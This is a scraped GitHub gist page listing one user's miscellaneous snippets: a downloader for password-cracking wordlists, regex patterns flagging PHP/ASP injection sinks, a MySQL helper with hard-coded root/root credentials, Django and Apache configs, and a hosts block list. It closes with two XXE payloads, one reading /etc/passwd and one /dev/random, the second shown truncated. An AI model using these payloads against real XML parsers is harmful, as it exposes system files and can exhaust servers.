Skip to content

Instantly share code, notes, and snippets.

View omarkurt's full-sized avatar
:octocat:
Working from home

Omar Kurt omarkurt

:octocat:
Working from home
207 followers · 98 following
View GitHub Profile
@omarkurt
omarkurt / wordlist.sh
Created October 2, 2012 12:57
packetstromsecurity all wordlist
#!/bin/bash
#Script by OliverK
#Downloads _every_ wordlist in the packet storm security site.
#April 18th, 2011
# Updated Oct , 2th, 2012
mkdir common
cd common
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2
@omarkurt
omarkurt / bugs.yaml
Created November 23, 2012 14:06
hedehödö
lang:
php:
- \\*\$_POST\[*.*\].
- \$_GET\[*.*\].
- .+\$_REQUEST\[*.*\].
- .?\$_SESSION\[*.*\].
- \\*\$_SERVER\[*.*\].
- \\*\eval\(*.*\).
- \\*\include\(.*[$_POST|GET].*\).
asp:
@omarkurt
omarkurt / minesql.sh
Created November 5, 2013 12:57
server working helper me
#!/bin/bash
echo "Command Using : "
echo "# Database Create (c) or Database Delete (d)"
USER="root" # mysql user
PASS="root" # mysql user pw
read command
@omarkurt
omarkurt / default
Last active August 29, 2015 13:56
django conf sites-available/default
<Location "/django"> #/django virtualname ex:webpy to django
AddHandler cgi-script .py
SetHandler mod_python
PythonHandler django.core.handlers.modpython
SetEnv DJANGO_SETTINGS_MODULE webpy.settings
PythonDebug Off
PythonPath "['/var/www/webpy'] + sys.path"
</Location>
@omarkurt
omarkurt / wsgi.py
Created February 12, 2014 11:17
wsgi conf file in loc /var/www/webpy/webpy
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "webpy.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
@omarkurt
omarkurt / gist:9546641
Created March 14, 2014 12:18
find /var/log -type f -regex ".*\.gz$"
find /var/log -type f -regex ".*\.[0-9]$"
@omarkurt
omarkurt / hosts
Created April 6, 2014 10:53
Create Host Blocking for Phorm
#<Phorm-sites>
127.0.0.1 a.oix.com
127.0.0.1 a.oix.net
127.0.0.1 a.openinternetexchange.com
127.0.0.1 a.phormlabs.com
127.0.0.1 a.webwise.com
127.0.0.1 a.webwise.net
127.0.0.1 b.oix.net
127.0.0.1 b.webwise.net
127.0.0.1 br.phorm.com
@omarkurt
omarkurt / Apache header to Security
Created August 11, 2015 08:25
#Security
Header set X-Frame-Options: sameorigin
Header set X-XSS-Protection: "1; mode=block"
Header set X-WebKit-CSP: "default-src 'self'"
Header set X-Content-Type-Options: nosniff
Header set X-Permitted-Cross-Domain-Policies: "master-only"
Header set Strict-Transport-Security "max-age=31536000; includeSubDomains"
Header unset ETag
@omarkurt
omarkurt / xxe
Created August 15, 2015 11:39
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>
@omarkurt
omarkurt / xxe.xml
Last active June 24, 2016 11:31
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE description [ <!ELEMENT description ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Test</title>
<link>za</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>